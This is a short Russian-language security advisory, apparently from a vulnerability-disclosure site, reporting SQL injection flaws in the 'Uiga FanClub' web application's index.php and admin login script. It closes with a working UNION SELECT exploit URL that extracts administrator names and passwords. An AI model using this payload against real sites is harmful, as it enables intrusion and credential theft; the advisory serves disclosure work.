Программа: Uiga FanClub
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "id" сценарием index.php (когда "view" установлен в "photos").
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "admin_name" и "admin_password" сценарием admin/admin_login.php.
Эксплоит:
www.site.com/Uigafanclub/index.php?view=photos&id=-9999+
Union+Select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+admin--
